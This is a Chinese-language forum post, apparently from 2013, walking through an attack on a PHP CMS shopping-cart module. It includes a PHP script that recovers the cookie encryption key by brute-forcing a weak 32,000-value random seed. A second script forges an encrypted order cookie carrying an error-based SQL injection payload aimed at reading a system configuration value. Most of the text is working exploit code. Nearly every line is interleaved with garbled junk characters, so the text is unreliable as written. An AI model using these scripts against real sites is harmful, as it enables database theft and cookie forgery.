www.xxx.com/plus/search.php?keyword=
+ |8 U" c$ J7 P! \! W0 @* k/ Y在 include/shopcar.class.php中5 U" V6 }/ R$ }+ k2 d" @* B3 G
先看一下这个shopcar类是如何生成cookie的
) U% H7 K# F: `* O239 function saveCookie($key,$value)
( P* n G# N; B" M* }# O. _, M: f240 {
/ E- A9 }- _( ~% X" l4 E3 w" `241 if(is_array($value))* f4 T' _1 T4 b+ M0 A0 \2 }" n- U
242 {/ y# n% [6 _& f. Z3 {6 C4 K+ u
243 $value = $this->enCrypt($this->enCode($value));
$ ~9 B4 _& i- H5 ?244 }
: f. f4 ]+ ~# t0 L( Q& d. c* T# F. G245 else
# m& w5 p/ C: }6 {246 {1 t. Y6 E- ]* Q' Q) j, G
247 $value = $this->enCrypt($value);
5 ~; b$ l/ I0 ] k4 }. D7 ?# l- K248 }
4 I3 f3 ^8 Q0 r& b) h) ]8 t249 setcookie($key,$value,time()+36000,’/');/ Z; R8 n3 ~2 u' R- r( `. c
250 }: F2 H0 w/ ^6 ^( |' v! @9 D6 o# M
简单的说,$key就是cookie的key,value就是value,enCode的作用是将array类型转变为a=yy&b=cc&d=know这样的类型,关键是enCrypt函数
' f9 f# ^# I/ e/ S& }186 function enCrypt($txt)
+ r' K- \( p2 \/ ^0 V187 {/ g/ } u1 a& S* ~; o9 O
188 srand((double)microtime() * 1000000);
1 Q3 T4 q$ R3 j" C2 ]) V' o189 $encrypt_key = md5(rand(0, 32000));, n$ ?" | l& G5 w r' }/ u3 W
190 $ctr = 0;
* w+ q! G% c( o191 $tmp = ”;
+ r% l+ B( I* W1 A7 E192 for($i = 0; $i < strlen($txt); $i++)4 A5 `5 y" k3 @$ S, Y" V
193 {) ~ a @4 u$ y; j3 _$ Q* d
194 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;, S5 G9 |* ^4 K
195 $tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);/ e0 b( @: \" P: E( a' B% o
196 }# F5 c- o B: M6 `% j7 ^, H3 `
197 return base64_encode($this->setKey($tmp));0 Z/ C8 Y7 p7 I3 J* x$ A
198 } v9 z4 Z8 W' I. D; u9 x4 z
213 function setKey($txt)
8 q6 z8 q7 d8 C) D8 X2 |214 {3 m; A2 s) L8 v, L8 \ K" _2 J
215 global $cfg_cookie_encode;! F4 \8 v: W5 Z" b; l
216 $encrypt_key = md5(strtolower($cfg_cookie_encode));
; s m) _% V. V, Q/ X217 $ctr = 0;$ _& r, Q3 _! n3 _7 n/ p
218 $tmp = ”;( p# ] C$ i' {; f) a
219 for($i = 0; $i < strlen($txt); $i++)
7 C8 x" q/ N$ ]# [220 {; I* F7 b: Y" t% H
221 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
6 } M0 T" c- y3 q. c222 $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];6 B5 J6 h9 P8 L' `& u
223 }
) J0 D& P& n& d1 l7 ]1 k224 return $tmp;4 P- `1 R' L- G3 a5 V& y6 }" r
225 }: r/ v7 [. @* j* z
enCrypt的参数$txt 我们是可知的,返回值就是cookie的值,这个我们也是可知的
4 C$ c) S- w, M( z然后到了enCrypt调用 setKey时的参数$tmp,这个参数在某种意义上,我们也是可知的,因为$encrypt_key = md5(rand(0, 32000));只有32000种可能,我们可以推出32000种可能的$tmp,从而推出32000种可能的md5(strtolower($cfg_cookie_encode)),对了,忘记说了,我们的目的是推测出setKey中$encrypt_key的值,然后才能任意构造出购物车的cookie,从推出的32000种md5(strtolower($cfg_cookie_encode)),简单过滤掉非字母数字的key,就只剩下几百个可能的key,然后我们再从新下一次订单,然后再获取几百个可能的key,然后取交集,得到最终key。
' l! n7 z2 C* {9 O具体代码如下:
0 l" g0 R5 @% w<?php
2 P$ v& P" A; Q i, `7 {$cookie1 = “X2lRPFNlCmlWc1cvAHNXMABjAToHbVcyB3ZXJFIwA20LIAlzU2ULPARyAmQGIVU5VyJbfFVsBiYNN1dsUG0DIl90UTFTLAo3VjBXYgBvVzgAZAEqBz9XagclVzBSbw==”; // here is the first cookie,change here
- V+ F, m4 W4 N/ n, d6 k$cookie2 = “ADYCb1RiBmUDJghwUyAFYlIxW2BROwhtVCUIe1AyC2UOJVMpADYBNgJ0AmRUcw5iAncAJ1JrCSlQalBrAj8CIwArAmJUKwY7A2UIPVM8BWpSNltwUWkINVR2CG9QbQ==”; // here is the second cookie ,change here
. y2 R' O9 I3 k! ?& w _$plantxt = “id=2&price=0&units=fun&buynum=1&title=naduohua1″; // here is the text , change here+ g8 @) N W$ X% x6 }$ _; z& l
function reStrCode($code,$string)% k. d$ _0 `# O$ s" |; F9 z b) G& n5 x
{2 i3 P0 x- o, e0 I$ \
$code = base64_decode($code);
) }% `# Z8 h1 e8 Y; ^$key = “”;) j0 r, q2 x7 N, I7 o9 L! X# n' s. [( M
for($i=0 ; $i<32 ; $i++)
3 y+ [" q8 ^+ E6 d1 G3 `{9 L$ R( g- U" f9 U& a& p
$key .= $string[$i] ^ $code[$i];" x( s% u3 Y3 l2 @/ u7 o7 L: D
}
* q! \1 G0 m- e1 b9 Ureturn $key;# X% [# ]+ z2 L" E$ ^2 a
}
( N1 q. R. h% A1 w2 Ffunction getKeys($cookie,$plantxt)) v1 W. W1 b2 [6 M2 H* `2 r
{
: D, ^ {7 k; p; H0 i$tmp = $cookie;
7 p; t* ?8 h X3 k* X1 f% z- {$results = array();3 j" |( Y9 X& I8 w6 ]
for($j=0 ; $j < 32000; $j++)
( |2 b, }6 i- m# z' Z! P# G{2 ?8 d; E' i+ [: h1 @
! E- i' A! D5 T1 z$txt = $plantxt;2 r2 a8 r t% E9 [9 L3 T2 B
$ctr = 0;. ^: D; U6 X' p& _- x
$tmp = ”;4 C6 j, _* M( m5 W
$encrypt_key = md5($j); `: `7 d4 ^$ O/ W
for($i =0; $i < strlen($txt); $i ++)
+ ~; P! {( j8 f7 T& V: l{: l' _. a/ X' E: G" @
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;( t' ?& O R% l2 V9 L* {* r
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
}; \' ^$ N. W# s& s}
* B+ g( C4 d! N: m2 X( i$string = $tmp;0 y) v" S( O# u+ F0 W/ V3 D G
$code = $cookie;
: S5 M; o5 s1 m2 A& `7 f, |( D$result = reStrCode($code,$string);
' W8 A; O# U$ n# ?% F9 u0 x- ~if(eregi(‘^[a-z0-9]+$’,$result))
( N# Y+ M. w: D{
3 T) D9 P& Q, Recho $result.”\n”;
! m) g/ K. I) S$results[] = $result;
n5 G$ a" J1 Q8 d8 y2 x}
3 O" f1 j6 Y. P3 s! u9 X# w. {/ x}
- R* g6 i6 D4 X# a. g( t0 L9 q Yreturn $results;2 U+ ^& y* i, G0 o- B- U3 K% \* U' R& I: n
}
4 A7 P/ h9 h8 W/ Y) B* n$results1 = getKeys($cookie1,$plantxt);" t, C' n" y/ ^7 G
$results2 = getKeys($cookie2,$plantxt); d: r4 ]! Y7 x6 I. g1 Q
print “\n——————–real key————————–\n”;
. |! m I3 N8 t9 W$ A( v& i6 a Rforeach($results1 as $test1)% A5 b) k0 v7 j; U/ s* ]
{! u/ `) v: Y i2 \3 f
foreach($results2 as $test2)
, |, a9 k, U; q7 R{" J% N0 u7 i( `' M* \6 M
if($test1 == $test2)& t/ a1 e3 |: ]1 o K- C+ v
{# F+ E) c6 S1 P d# ?% k+ O* A( U
echo $test1.”\n”;
' i) o! M% G; N# g} p& e) }; j4 a9 t7 [, ^% Y6 }. e5 i
}
1 ]+ j6 l9 S( E4 q- U; F}1 ~1 E. B$ Z2 v4 z
?>
6 A6 q# z' j1 g% ~, ucookie1 和 cookie2 是我下了两次订单后分别生成的cookie,2 t+ p7 M$ S5 l/ t: |4 i
plantxt可以根据页面来自己推算,大概就是这个格式:id=2&price=0&units=fun&buynum=1&title=naduohua1
6 K9 Y) x: R/ n/ L然后推算出md5(strtolower($cfg_cookie_encode))' ?# C) p: X A9 l) Z3 w
得到这个key之后,我们就可以构造任意购物车的cookie) K$ u) Z7 O6 y5 A! T6 q
接着看( h2 o" N, \& C+ P+ X
20 class MemberShops. s& F" B% O9 h7 ^# \0 X# U+ K: Y
21 {
) k3 L: `6 A- D# x& j) q$ V/ t22 var $OrdersId;5 x3 V2 H: O4 @ U; l7 N( F
23 var $productsId;
& Y$ b. _3 k$ g/ C% E/ e- j24
1 _' D/ r/ S! U8 _, A1 \& o2 r25 function __construct() c- d) G' A3 a- ^" r! O* E8 Q2 H) W) ~1 d
26 {% ~( T, F3 t$ M1 {$ O' e( O: u% s
27 $this->OrdersId = $this->getCookie(“OrdersId”);$ V& h ~9 F x& G0 Q
28 if(empty($this->OrdersId))
5 Y0 W- |+ _3 M3 `& j0 a: k* B( l29 {
' `7 u* S/ w. j. C1 Y30 $this->OrdersId = $this->MakeOrders();! |) i6 x0 ]5 Q. O/ V @- S1 _2 C
31 }& i- p4 B- g; G0 w
32 }0 w* C! F9 p% f6 L0 q; u
发现OrderId是从cookie里面获取的2 G# {4 J# t! a2 X" _
然后
/ Q$ C# J$ O6 Q' N4 V/plus/carbuyaction.php中的
' f' ?& Z8 F9 M Y: U) d6 @29 $cart = new MemberShops();
& L7 r3 u& R# l5 R( k39 $OrdersId = $cart->OrdersId; //本次记录的订单号
) u6 b* T# j; S7 |3 ]# ^6 V……4 ]2 }/ W/ m3 @* {# |
173 $rows = $dsql->GetOne(“SELECT `oid` FROM #@__shops_orders WHERE oid=’$OrdersId’ LIMIT 0,1″);& k" w8 i, ?* Y0 @
接着我们就可以注入了
! V: Z( h6 |$ K- o4 W @' m5 H, t9 T通过利用下面代码生成cookie:, M, P7 q, m) P. o8 b
<?php0 r8 m. c' M* z- q3 g V
$txt = “1′ or 1=@`\’` and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select value from #@__sysconfig where aid=3),1,62)))a from information_schema.tables group by a)b) or 1=@`\’` or ’1′=’1″;
3 x# \9 u! z5 n' z6 l, n/ ?) t$encrypt_key = “9f09293b7419ed68448fb51d5b174834″; // here is the key, please change here
3 f( h- |0 I7 m9 H( \2 ^0 hfunction setKey($txt)
: V D- F+ ?& f{
( v7 X# Y1 F9 |! I& Y" H4 Kglobal $encrypt_key;( @; X3 o2 j# Y3 e
$ctr = 0;1 o% w. U& o* q+ c- x. E- m
$tmp = ”;2 Y, l) P- [5 Z* H7 E# P4 z
for($i = 0; $i < strlen($txt); $i++). s; b: }; f# U8 f/ }! T1 n
{
# R) h* |$ e& W1 m1 [' A. |$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
- N3 J) E6 O* w$ [- I$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
" H4 A; `) e9 ]3 U2 i7 c}
" f, O4 h1 N5 x" R5 C4 O# Ureturn $tmp;
9 n; C7 @9 F# Z' ^# N0 p+ B}
$ c( `; N* D! z# W6 [function enCrypt($txt)
4 Q0 }$ y3 p p# l" R1 m) S8 ]. X{
. A+ U3 y7 f! W1 E7 T, msrand((double)microtime() * 1000000);
9 b/ F6 }- f' p) c$encrypt_key = md5(rand(0, 32000));+ f* n4 N$ S" b: s! u; N4 @; X4 M
$ctr = 0;
; X w3 M& k* n0 Q- |; f' _$tmp = ”;
+ N- m2 I. J2 r7 _* x) e- Qfor($i = 0; $i < strlen($txt); $i++)
0 Q- m/ ^1 \1 s9 M* n5 {{4 o' [1 h3 e: B* |
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;" |+ X6 g$ p0 Y; n) K: x: o
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);0 \' T$ W- n6 z) O
}
6 o* ^, B- A3 S! Treturn base64_encode(setKey($tmp));; Q% ]) J8 p- v0 s% Y7 k i- k' V* ]# _
}
1 O7 ^$ B* ?% H8 P. _3 ?for($dest =0;$dest = enCrypt($txt);)( j, A$ V5 z/ f4 @5 X$ x# V
{
$ y3 ?$ C9 z" Q% o$ a9 qif(!strpos($dest,’+'))3 v5 r7 M. Q; d1 g0 Q6 d& `/ y
{. _, m, B( N" L- d- T. M$ o
break;# Y$ N( m: X+ Y5 Z8 F. Z, z4 E: e
}; C/ E" c" J( B: o3 Q8 X$ X/ L9 [
}6 m/ W+ I4 N9 N
echo $dest.”\n”;( j# L7 ~/ q w5 H
?>" C% [; G. b6 n" z; u2 H
. p) D+ y& y1 J: i
|
发表于 2013-2-13 23:58:29
收藏
支持
反对